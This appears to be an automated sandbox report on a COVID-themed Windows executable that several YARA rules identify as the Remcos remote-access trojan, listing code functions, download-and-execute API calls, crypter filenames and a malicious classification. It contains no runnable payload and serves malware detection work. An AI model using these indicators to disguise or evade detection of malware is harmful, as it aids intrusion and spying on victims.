Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142CFD0 33_2_0142CFD0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142DFA0 33_2_0142DFA0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01428130 33_2_01428130
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_014265E0 33_2_014265E0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142D79D 33_2_0142D79D
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142D7B6 33_2_0142D7B6
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01425990 33_2_01425990
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_014238C0 33_2_014238C0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01420D78 33_2_01420D78
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01421DB0 33_2_01421DB0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142CFC1 33_2_0142CFC1
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142DF85 33_2_0142DF85
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142DF9E 33_2_0142DF9E
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665E4A8 33_2_0665E4A8
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665C1D8 33_2_0665C1D8
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665F150 33_2_0665F150
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665B860 33_2_0665B860
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_06657813 33_2_06657813
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665E497 33_2_0665E497
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_06658CD0 33_2_06658CD0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_066557C1 33_2_066557C1
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_066557D0 33_2_066557D0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665B84F 33_2_0665B84F
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0082739A 33_2_0082739A
PE file contains strange resources
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Section loaded: mscorjit.dll
Uses 32bit PE files
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 00000000.00000002.419012391.0000000003F25000.00000004.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.418279701.0000000002F5D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: String function: 0040FC1A appears 54 times
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: String function: 0040FCBA appears 34 times
Sample file is different than original file name gathered from version info
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: OriginalFilename vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421491993.0000000008040000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameEefpkmt.dll0 vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.416785382.00000000011DB000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000000.227770784.0000000000A32000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEcpxyswgubfautk.dll" vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000016.00000000.406987972.0000000000182000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000017.00000000.408268140.0000000000222000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000018.00000000.409445105.00000000000A2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000019.00000000.410713658.0000000000232000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001A.00000002.413557314.0000000000222000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001B.00000002.414728789.00000000000E2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.464412455.0000000002D27000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.429240159.0000000000652000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameVNXT.exe* vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamee.exe4 vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UK COVID UPDATES AND ENTITLEMENT.exe.log
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/14@101/5
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00408150 FindResourceA,LoadResource,LockResource,SizeofResource, 28_2_00408150
Source: UK COVID UPDATES AND ENTITLEMENT.exe Virustotal: Detection: 26%
Source: UK COVID UPDATES AND ENTITLEMENT.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File read: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe 'C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe'
